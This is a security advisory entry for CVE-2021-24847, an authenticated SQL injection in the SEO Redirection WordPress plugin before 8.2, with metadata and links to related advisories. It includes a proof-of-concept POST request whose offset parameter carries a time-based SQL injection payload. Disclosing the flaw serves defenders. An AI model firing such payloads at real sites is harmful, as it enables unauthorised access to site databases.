WordPress Plugin Vulnerabilities

SEO Redirection < 8.2 - Subscriber+ SQL Injection

Description

The importFromRedirection AJAX action of the plugin, available to any authenticated user, does not properly sanitise the offset parameter before using it in a SQL statement, leading an SQL injection when the redirection plugin is also installed

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: [any authenticated user]
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 126

action=importFromRedirection&offset=1+procedure+analyse(updatexml(rand(),concat(0x3a,benchmark(20000000,sha1(1))),0x20),1)--+-

Affects Plugins

Plugin icon
seo-redirection
Fixed in 8.2

References

CVE
CVE-2021-24847

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
7.7 (high)

Miscellaneous

Original Researcher
ZhongFu Su(JrXnm) of Wuhan University
Submitter
ZhongFu Su(JrXnm) of Wuhan University
Submitter website
https://blog.szfszf.top
Verified
Yes
WPVDB ID
679ca6ed-2343-43f3-9c3e-2c12e12407c1

Timeline

Publicly Published
2021-10-18 (about 2 years ago)
Added
2021-10-18 (about 2 years ago)
Last Updated
2022-09-26 (about 1 years ago)

Other

Published
Title
Published
2014-08-01
Title
ipfeuilledechou - SQL Injection
Published
2014-08-01
Title
WP Symposium < 12.12 - Multiple SQL Injections
Published
2021-10-07
Title
Schreikasten <= 0.14.18 - Author+ SQL Injections
Published
2022-11-21
Title
Dokan < 3.7.6 - Unauthenticated SQLi
Published
2022-05-09
Title
Note Press <= 0.1.10 - Admin+ SQLi via Bulk Actions